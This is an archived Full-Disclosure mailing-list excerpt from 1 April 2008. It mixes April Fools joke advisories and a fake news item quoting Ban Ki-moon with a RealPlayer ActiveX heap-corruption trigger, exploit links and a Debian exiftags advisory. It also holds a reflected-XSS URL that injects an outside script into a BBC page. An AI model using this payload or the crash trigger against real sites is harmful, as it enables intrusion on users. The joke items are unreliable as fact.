said Ban Ki-moon

More at

http://www.securitylab.ru/news/extra/349440.php (English)

or

http://www.securitylab.ru/news/349441.php (Russian)

with links to BBC an un.org.



BR,

Valery Marchuk

www.SecurityLab.ru







From s.u.n at free.Fr  Tue Apr  1 11:18:14 2008
From: s.u.n at free.Fr (S/U/N)
Date: Tue, 01 Apr 2008 12:18:14 +0200
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
In-Reply-To: <627CE286524A4000B3318FDCF5074725@gw1>
References: <AB202291-2AD3-4AD3-AA36-D4217FFB2114@yahoo.com.ar>
	<627CE286524A4000B3318FDCF5074725@gw1>
Message-ID: <47F20BE6.7070604@free.Fr>

Nice1st of xss april!
http://www.bbc.co.uk/apps/ifl/fivelive/sportsquiz/quizengine?quiz=today&pagerType=pages%3Cscript%20src=http://www.securitylab.ru/test/1april.js%3E%3C/script%3E%3C!--&pagerData=1

Valery Marchuk a ?crit :
> BBC reports: Secretary-General Ban Ki-moon made an official statement 
> supporting Windows Vista and Windows Server 2008.
>
> "I believe a bug in OS Linux has allowed hackers to access Pentagon network 
> and steal classified national security information and place blame on China"", 
> said Ban Ki-moon
>
> More at
>
> http://www.securitylab.ru/news/extra/349440.php (English)
>
> or
>
> http://www.securitylab.ru/news/349441.php (Russian)
>
> with links to BBC an un.org.
>
>
>
> BR,
>
> Valery Marchuk
>
> www.SecurityLab.ru
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>   



From evilrabbi at gmail.com  Tue Apr  1 14:58:13 2008
From: evilrabbi at gmail.com (evilrabbi)
Date: Tue, 1 Apr 2008 08:58:13 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
	Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>

Why would you realease something like this without telling the vendor? What
you did is irresponsible.


On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters <nate.mcfeters at gmail.com>
wrote:

> Hahaha, nice find.
>
> On 4/1/08, I)ruid <druid at caughq.org> wrote:
> >
> >                      ____      ____     __    __
> >                     /    \    /    \   |  |  |  |
> >        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
> >                   |  |      |  |__|  | |  |  |  |
> >                   |  |  ___ |   __   | |  |  |  |
> > ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
> >                     \____/  |__|  |__|  \______/
> >
> >
> >                    Computer Academic Underground
> >                        http://www.caughq.org
> >                          Security Advisory
> >
> > ===============/========================================================
> > Advisory ID:    CAU-2008-0001
> > Release Date:   04/01/2008
> > Title:          Slowly Closing Door Race Condition
> > Application/OS: Physical Structures
> > Topic:          Physical structures employing exit doors with locks
> >                are vulnerable to a race condition.
> > Vendor Status:  Not Notified
> > Attributes:     Physical, Race Condition
> > Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
> > Author/Email:   CAU <advisories (at) caughq.org>
> > ===============/========================================================
> >
> > Overview
> > ========
> >
> > Physical structures which employ automatically locking doors to secure
> > exit points expose a race condition which may allow unauthorized entry.
> >
> >
> > Impact
> > ======
> >
> > Malicious outsiders may be able to enter a structure via an exit point.
> >
> > Exit points may additionally provide an exit from a secure area of the
> > structure, allowing an outsider entering through the exit point to gain
> > direct access to the secure area.
> >
> >
> > Affected Systems
> > ================
> >
> > Physical structures which employ automatically locking doors at exit
> > points of the structure.
> >
> >
> > Technical Explanation
> > =====================
> >
> > An exit's lock[1] generally converts a two-way door into a one-way
> > door, allowing a person to traverse the door's threshold in one
> > direction but not in the other.  These types of locks are used to
> > secure exit points of structures so that people may exit via the door
> > but not re-enter without disabling the lock through force or
> > authentication.
> >
> > When a person exits the structure through an exit point which is
> > secured by such a mechanism, a race condition exists wherein a
> > malicious outsider may be able to reach the door and enter through it
> > before it closes and locks itself.
> >
> > Many doors, especially heavier ones, also employ closing mechanisms[2]
> > which are designed to cause the door to close slowly so as not to slam
> > the door shut and damage the door frame, or damage any human appendage
> > which may be in between the door and it's frame.  Such closing
> > mechanisms can greatly increase the amount of time that the race
> > condition exists.
> >
> >
> > Solution & Recommendations
> > ==========================
> >
> > 1) Always ensure that personnel exiting an exit door wait outside the
> >   door until it has completely closed and locked before walking
> >   away.
> >
> > 2) Employ a double door system such as is used in an air-lock where
> >   the interior door must be secured prior to the exterior door being
> >   allowed to open.
> >
> >
> > Exploitation
> > ============
> >
> > First identify the exit point that you want to exploit.  Stand at a
> > safe distance during a high-traffic time and watch for people to use
> > the exit point.  Time how long it takes for the door to close and
> > lock itself when someone traverses the exit point.
> >
> > Next, identify a safe hiding place near the exit point, preferably
> > in a direction that would be behind a person exiting the door, but
> > which is within a distance to the exit point which you could traverse
> > in under the door's closing time at a brisk pace or run.
> >
> > Finally, hide in this location during a lower traffic time and wait
> > for someone to utilize the exit point.  After they have exited the
> > door and are walking away, run to the door and enter before it has
> > closed and locked.  Extra points are awarded for a spectacular dive
> > and/or roll to catch the door at the very last second.
> >
> >
> > References
> > ==========
> >
> > [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> > [2] http://en.wikipedia.org/wiki/Door_closer
> >
> >
> > Credits & Gr33ts
> > ================
> >
> > Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
> >
> >
> > --
> > I)ruid, C?ISSP
> > druid at caughq.org
> > http://druid.caughq.org
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
-- h0 h0 h0 --
www.nopsled.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/7c4543a1/attachment.html 

From razishaban at gmail.com  Tue Apr  1 15:22:55 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Tue, 1 Apr 2008 18:22:55 +0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
	Condition
In-Reply-To: <a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
	<a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
Message-ID: <2d792fb20804010722g686e6b7aq8b9ea4b25cac91c4@mail.gmail.com>

April Fools!

--
Razi

On 4/1/08, evilrabbi <evilrabbi at gmail.com> wrote:
> Why would you realease something like this without telling the vendor? What
> you did is irresponsible.
>
>
>
> On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters <nate.mcfeters at gmail.com>
> wrote:
>
> > Hahaha, nice find.
> >
> >
> > On 4/1/08, I)ruid <druid at caughq.org> wrote:
> > >                      ____      ____     __    __
> > >                     /    \    /    \   |  |  |  |
> > >        ----====####/  /\__\##/  /\  \##|  |##|
> |####====----
> > >                   |  |      |  |__|  | |  |  |  |
> > >                   |  |  ___ |   __   | |  |  |  |
> > > ------======######\  \/  /#|  |##|  |#|  |##|
> |######======------
> > >                     \____/  |__|  |__|  \______/
> > >
> > >
> > >
> > >
> > >                    Computer Academic Underground
> > >                        http://www.caughq.org
> > >                          Security Advisory
> > >
> > >
> ===============/========================================================
> > > Advisory ID:    CAU-2008-0001
> > > Release Date:   04/01/2008
> > > Title:          Slowly Closing Door Race Condition
> > > Application/OS: Physical Structures
> > > Topic:          Physical structures employing exit doors with locks
> > >                are vulnerable to a race condition.
> > > Vendor Status:  Not Notified
> > > Attributes:     Physical, Race Condition
> > > Advisory URL:
> http://www.caughq.org/advisories/CAU-2008-0001.txt
> > > Author/Email:   CAU <advisories (at) caughq.org>
> > >
> ===============/========================================================
> > >
> > > Overview
> > > ========
> > >
> > > Physical structures which employ automatically locking doors to secure
> > > exit points expose a race condition which may allow unauthorized entry.
> > >
> > >
> > > Impact
> > > ======
> > >
> > > Malicious outsiders may be able to enter a structure via an exit point.
> > >
> > > Exit points may additionally provide an exit from a secure area of the
> > > structure, allowing an outsider entering through the exit point to gain
> > > direct access to the secure area.
> > >
> > >
> > > Affected Systems
> > > ================
> > >
> > > Physical structures which employ automatically locking doors at exit
> > > points of the structure.
> > >
> > >
> > > Technical Explanation
> > > =====================
> > >
> > > An exit's lock[1] generally converts a two-way door into a one-way
> > > door, allowing a person to traverse the door's threshold in one
> > > direction but not in the other.  These types of locks are used to
> > > secure exit points of structures so that people may exit via the door
> > > but not re-enter without disabling the lock through force or
> > > authentication.
> > >
> > > When a person exits the structure through an exit point which is
> > > secured by such a mechanism, a race condition exists wherein a
> > > malicious outsider may be able to reach the door and enter through it
> > > before it closes and locks itself.
> > >
> > > Many doors, especially heavier ones, also employ closing mechanisms[2]
> > > which are designed to cause the door to close slowly so as not to slam
> > > the door shut and damage the door frame, or damage any human appendage
> > > which may be in between the door and it's frame.  Such closing
> > > mechanisms can greatly increase the amount of time that the race
> > > condition exists.
> > >
> > >
> > > Solution & Recommendations
> > > ==========================
> > >
> > > 1) Always ensure that personnel exiting an exit door wait outside the
> > >   door until it has completely closed and locked before walking
> > >   away.
> > >
> > > 2) Employ a double door system such as is used in an air-lock where
> > >   the interior door must be secured prior to the exterior door being
> > >   allowed to open.
> > >
> > >
> > > Exploitation
> > > ============
> > >
> > > First identify the exit point that you want to exploit.  Stand at a
> > > safe distance during a high-traffic time and watch for people to use
> > > the exit point.  Time how long it takes for the door to close and
> > > lock itself when someone traverses the exit point.
> > >
> > > Next, identify a safe hiding place near the exit point, preferably
> > > in a direction that would be behind a person exiting the door, but
> > > which is within a distance to the exit point which you could traverse
> > > in under the door's closing time at a brisk pace or run.
> > >
> > > Finally, hide in this location during a lower traffic time and wait
> > > for someone to utilize the exit point.  After they have exited the
> > > door and are walking away, run to the door and enter before it has
> > > closed and locked.  Extra points are awarded for a spectacular dive
> > > and/or roll to catch the door at the very last second.
> > >
> > >
> > > References
> > > ==========
> > >
> > > [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> > > [2] http://en.wikipedia.org/wiki/Door_closer
> > >
> > >
> > > Credits & Gr33ts
> > > ================
> > >
> > > Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
> > >
> > >
> > > --
> > > I)ruid, C?ISSP
> > > druid at caughq.org
> > > http://druid.caughq.org
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> -- h0 h0 h0 --
> www.nopsled.net
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>


From elazar at hushmail.com  Tue Apr  1 15:28:47 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 10:28:47 -0400
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <20080401142847.BCC6CD01A3@mailserver10.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Let the foolz begin :) Happy April 1st!

On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<fdlist at digitaloffense.net> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>    METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
>       AND A CLOSED SOURCE LICENSE AGREEMENT.
>
>After over a year and a half in stealth-mode, Metasploit
>Corporation has announced
>the 4.0 release of their flag-ship product, The Metasploit
>Framework.  The new
>release comes jam-packed with exciting features that are sure to
>please even
>the German legal system.  The following brief list includes some
>of the more
>fantastic changes.
>
>PWNCRAFT!
>
>Tired of fighting the good fight with the tried and true user
>interfaces you've
>come to expect from exploitation frameworks?  Seeing a command
>shell for the
>5000th time got you down?  Well, you're in luck.  Metasploit has
>decided to
>return to its rootz in '08 and focus on the exploitation-as-a-game
>model.
>PwnCraft brings the worlds of ownage and pwnage together for the
>first time in
>a revolutionary Real Time Strategy (RTS) world.  Don't be fooled
>by the
>game-like interface, though!  The actions you take in PwnCraft
>have a real
>effect on the world around you!  Here's just a taste of some of
>the absolutely
>insane features you can look forward to:
>
>  - Glide through enemy networks with a squadron of elegant winged
>pwnies
>  - Launch devastating attacks against enemy ports in an all-out
>IPS-evading
>    TCP/IP assault
>  - Use the fuzzy Burrowing Badger unit to discover 0day flaws in
>enemy
>    defenses
>  - Conqueer cities and installing agents who can sabotage and
>smuggle other
>    units to new Vistas
>  - An entirely in-game interface to the vulnerability sharing
>market to
>    improve your arsenal on the fly!
>  - AND MORE!
>
>Beta testing of PwnCraft is currently underway and we are hoping
>to begin
>releasing it in stores at a retail price of $49.99 in Q3 2009.
>More details
>about the game can be found on the Metasploit website:
>
>http://metasploit.com/
>
>
>CLOSED SOURCE LICENSE
>
>After years of struggling to define Metasploit's licensing
>position a final
>decision has been made to "screw it" and move the framework to a
>closed source
>license agreement.  The decision was made to sell out for a number
>of reasons,
>not the least of which has to do with the benjamins.  Metasploit
>2.x and 3.x
>will no longer be available for public download.
>
>SPLOIT AT ME
>
>Get the latest exploits from Metasploit's patent-pending Sploit At
>Me service
>that delivers exploits on demand.  You can rest assured that
>Metasploit's
>Sploit At Me service will attempt to compromise machines of your
>choosing with
>*99% reliability.
>
>About Metasploit Corporation
>
>Metasploit Corporation is an industry leader with thousands of non-
>paying
>customers world-wide.  Metasploit delivers high-quality, top-
>notch,
>success-driven exploits to the security world as one-stop-shop
>exploitation
>framework.
>
>
>  * The other 1% of the time, your own machine will be
>compromised.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkfyRp8ACgkQi04xwClgpZgvQwP+P5O3dPIIu3t/aOJo8ufryik2p4BS
J1xM7129LTFPfwNgx2lnBEAbLvLSAUMcgRaHBD0HJ+u6r/mxLJd7S0XFYRDjFGJ6PTYE
i7/HRYmIQAXY1ENCyBHPvADGs7Ivj4x4sfcGN7OoeOcDyufqm0DC6LMkatQUxKu+lLoF
7yhhn9U=
=j0A2
-----END PGP SIGNATURE-----

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposADR0PtOIVVC5EPU4F30Wlhs3UJjIvS4qQsdD3pzBWo/


From elazar at hushmail.com  Tue Apr  1 16:46:34 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 11:46:34 -0400
Subject: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap
	Corruption
Message-ID: <20080401154635.1A3551A0039@mailserver8.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/
browser/realplayer_console.rb

Elazar


On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<elazar at hushmail.com> wrote:
>Who:
>Real Networks
>http://www.real.com
>
>What:
>Real Networks Real Player is a popular media player.
>
>How:
>Real Player utilizes an ActiveX control to play content within the
>users browser.
>
>rmoc3260.dll version 6.0.10.45
>{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
>{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
>
>It is possible to modify heap blocks after they are freed and
>overwrite certain registers, possibly allowing code execution.
>Like
>so:
>
>------------
>var buf = '';
>while (buf.length < 1005) buf = buf + 'A';
>
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m
>
>//repeat
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m --> Should crash here
>-------------
>
>Workaround:
>Set the killbit for this control. See
>http://support.microsoft.com/kb/240797
>
>Fix:
>No official fix known
>
>Exploit:
>Working on it
>
>Elazar
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkfyWNoACgkQi04xwClgpZgyVgP+N7kKGC7cD/1qnnauXIi30j+fmEbK
sIe+tOWjTSUKcoTZsoFLiQYd3tKu/t+mauZSi1msUaPgjHu1Or/laRU3Wgw008lnLAmC
lT4O/tjlZP6luuzxCHyDrY6p5ze4sb4uDukKnGVHqpNMDoK/s0TFD/fZiaBdc7ZFvL9o
4Y6w7ZY=
=IpM9
-----END PGP SIGNATURE-----

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposuNJokZ1ABDCgGd9ckObZCsDzUVQlPhlov4Mrkal8uM/


From DAVID.G.WESTON at saic.com  Tue Apr  1 16:49:03 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Tue, 01 Apr 2008 08:49:03 -0700
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
 Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <C417A77F.3864%david.g.weston@saic.com>

I saw Nate do a 0day sploit on this at the Hard Rock Amsterdam!


On 3/31/08 10:18 PM, "Nate McFeters" <nate.mcfeters at gmail.com> wrote:

> Hahaha, nice find.
> 
> On 4/1/08, I)ruid <druid at caughq.org> wrote:
>>                      ____      ____     __    __
>>                     /    \    /    \   |  |  |  |
>>        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
>>                   |  |      |  |__|  | |  |  |  |
>>                   |  |  ___ |   __   | |  |  |  |
>> ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
>>                     \____/  |__|  |__|  \______/
>> 
>>                    Computer Academic Underground
>>                        http://www.caughq.org
>>                          Security Advisory
>> 
>> ===============/========================================================
>> Advisory ID:    CAU-2008-0001
>> Release Date:   04/01/2008
>> Title:          Slowly Closing Door Race Condition
>> Application/OS: Physical Structures
>> Topic:          Physical structures employing exit doors with locks
>>                are vulnerable to a race condition.
>> Vendor Status:  Not Notified
>> Attributes:     Physical, Race Condition
>> Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
>> Author/Email:   CAU <advisories (at) caughq.org <http://caughq.org> >
>> ===============/========================================================
>> 
>> Overview
>> ========
>> 
>> Physical structures which employ automatically locking doors to secure
>> exit points expose a race condition which may allow unauthorized entry.
>> 
>> 
>> Impact
>> ======
>> 
>> Malicious outsiders may be able to enter a structure via an exit point.
>> 
>> Exit points may additionally provide an exit from a secure area of the
>> structure, allowing an outsider entering through the exit point to gain
>> direct access to the secure area.
>> 
>> 
>> Affected Systems
>> ================
>> 
>> Physical structures which employ automatically locking doors at exit
>> points of the structure.
>> 
>> 
>> Technical Explanation
>> =====================
>> 
>> An exit's lock[1] generally converts a two-way door into a one-way
>> door, allowing a person to traverse the door's threshold in one
>> direction but not in the other.  These types of locks are used to
>> secure exit points of structures so that people may exit via the door
>> but not re-enter without disabling the lock through force or
>> authentication.
>> 
>> When a person exits the structure through an exit point which is
>> secured by such a mechanism, a race condition exists wherein a
>> malicious outsider may be able to reach the door and enter through it
>> before it closes and locks itself.
>> 
>> Many doors, especially heavier ones, also employ closing mechanisms[2]
>> which are designed to cause the door to close slowly so as not to slam
>> the door shut and damage the door frame, or damage any human appendage
>> which may be in between the door and it's frame.  Such closing
>> mechanisms can greatly increase the amount of time that the race
>> condition exists.
>> 
>> 
>> Solution & Recommendations
>> ==========================
>> 
>> 1) Always ensure that personnel exiting an exit door wait outside the
>>   door until it has completely closed and locked before walking
>>   away.
>> 
>> 2) Employ a double door system such as is used in an air-lock where
>>   the interior door must be secured prior to the exterior door being
>>   allowed to open.
>> 
>> 
>> Exploitation
>> ============
>> 
>> First identify the exit point that you want to exploit.  Stand at a
>> safe distance during a high-traffic time and watch for people to use
>> the exit point.  Time how long it takes for the door to close and
>> lock itself when someone traverses the exit point.
>> 
>> Next, identify a safe hiding place near the exit point, preferably
>> in a direction that would be behind a person exiting the door, but
>> which is within a distance to the exit point which you could traverse
>> in under the door's closing time at a brisk pace or run.
>> 
>> Finally, hide in this location during a lower traffic time and wait
>> for someone to utilize the exit point.  After they have exited the
>> door and are walking away, run to the door and enter before it has
>> closed and locked.  Extra points are awarded for a spectacular dive
>> and/or roll to catch the door at the very last second.
>> 
>> 
>> References
>> ==========
>> 
>> [1] http://en.wikipedia.org/wiki/Lock_%28device%29
>> [2] http://en.wikipedia.org/wiki/Door_closer
>> 
>> 
>> Credits & Gr33ts
>> ================
>> 
>> Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
>> 
>> 
>> --
>> I)ruid, C?ISSP
>> druid at caughq.org
>> http://druid.caughq.org
>> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> 
>> 
>> 
>> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> 
>> Thanks,
>> David Weston
>> Security Engineer
>> Science Application International Corporation
>> Web:  http://www.saic.com/infosec
>> Email:DAVID.G.WESTON at saic.com
>> Office:858-826-5435
>> Cell:   310-866-9713

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/4f4cce11/attachment.html 

From devin at debian.org  Tue Apr  1 08:54:38 2008
From: devin at debian.org (Devin Carraway)
Date: Tue,  1 Apr 2008 09:54:38 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1533-2] New exiftags packages fix
	several vulnerabilities
Message-ID: <20080401075438.B19CE326A9E@morgana.loeki.tv>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1533-2                  security at debian.org
http://www.debian.org/security/                           Devin Carraway
April 01, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : exiftags
Vulnerability  : insufficient input sanitizing
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-6354 CVE-2007-6355 CVE-2007-6356
Debian Bug     : 457062

Christian Schmid and Meder Kydyraliev (Google Security) discovered a
number of vulnerabilities in exiftags, a utility for extracting EXIF
metadata from JPEG images. This update merely adds the packages for
Debian 3.1 sarge (oldstable) which were missing in the previous DSA.

The Common Vulnerabilities and Exposures project identified the
following three problems:

CVE-2007-6354

    Inadequate EXIF property validation could lead to invalid memory
    accesses if executed on a maliciously crafted image, potentially
    including heap corruption and the execution of arbitrary code.

CVE-2007-6355

    Flawed data validation could lead to integer overflows, causing
    other invalid memory accesses, also with the potential for memory
    corruption or arbitrary code execution.

CVE-2007-6356

    Cyclical EXIF image file directory (IFD) references could cause
    a denial of service (infinite loop).

For the stable distribution (etch), these problems have been fixed in
version 0.98-1.1+etch1.

For the oldstable distribution (sarge), these problems have been fixed
in version 0.98-1.1+0sarge1.

For the unstable distribution (sid), these problems have been fixed in
version 1.01-0.1.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1.diff.gz
    Size/MD5 checksum:     5131 3baa30a42f531580a502a3f3818ead56
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98.orig.tar.gz
    Size/MD5 checksum:    50195 5a8a4057c4dac1d765da5f9ef4527bdf
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1.dsc
    Size/MD5 checksum:      873 b85e0a4a382cac6a844af52e42c670bb

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_alpha.deb
    Size/MD5 checksum:    63406 d4b9ee67dcfb07ef1bc6ab143bd50496

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_amd64.deb
    Size/MD5 checksum:    56656 83688a1b3ec9c359a734f04bb985350d

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_arm.deb
    Size/MD5 checksum:    56064 eb60a8336c020a588458bb07fb57c1bc

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_hppa.deb
    Size/MD5 checksum:    59824 be52ea467c6651b65a371895948005b4

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_i386.deb
    Size/MD5 checksum:    52514 1850fa2d6b54fe1029553605509ef7cf

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_ia64.deb
    Size/MD5 checksum:    76252 ce03fb64e959c8a2f24ad3744ca80fd5

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_m68k.deb
    Size/MD5 checksum:    53120 8c98a08982680a42e1c6aab585faf487

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_mips.deb
    Size/MD5 checksum:    60736 14cbe8b15c5260b969961cf4107da991

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_mipsel.deb
    Size/MD5 checksum:    60040 3bdbbf546125a75c00800cb4039b25ab

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_powerpc.deb
    Size/MD5 checksum:    54812 8d33fe8cb068bf1f02ce0c4a8cd3c8d0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_s390.deb
    Size/MD5 checksum:    58208 9e7eeadcaefc2fe90aa11ece173348e2


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1.dsc
    Size/MD5 checksum:      577 7b8743189acd9b4c0a7a25cabb5b753d
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1.diff.gz
    Size/MD5 checksum:     5128 2f82244bd73046f31b07e77a7381dd15
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98.orig.tar.gz
    Size/MD5 checksum:    50195 5a8a4057c4dac1d765da5f9ef4527bdf

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_alpha.deb
    Size/MD5 checksum:    62970 e481f4f8ce70b25a648a2d3678d48e07

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_amd64.deb
    Size/MD5 checksum:    57924 a5a6906e8d05beeffc763379a9c45ba2

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_arm.deb
    Size/MD5 checksum:    56278 b06bf3f7722f034096719c7153fae5bd

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_i386.deb
    Size/MD5 checksum:    52558 ceed89333fd99a11d26765390ae35871

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_ia64.deb
    Size/MD5 checksum:    75164 ca893189af6fe68536774bac7dd357a1

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_mips.deb
    Size/MD5 checksum:    61010 a5415b5fb389903c20c431a245fcb3fb

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_mipsel.deb
    Size/MD5 checksum:    60064 2961a652e3cb269a0671fe2281b2f017

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_powerpc.deb
    Size/MD5 checksum:    54734 23a4389bb781e0a054c1687986ac1b1a

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_s390.deb
    Size/MD5 checksum:    58988 38bf328294b2afe633ef99a5b97f3f1e

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_sparc.deb
    Size/MD5 checksum:    56132 d2e1cd3190fe528527beaacc2ef6be3f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
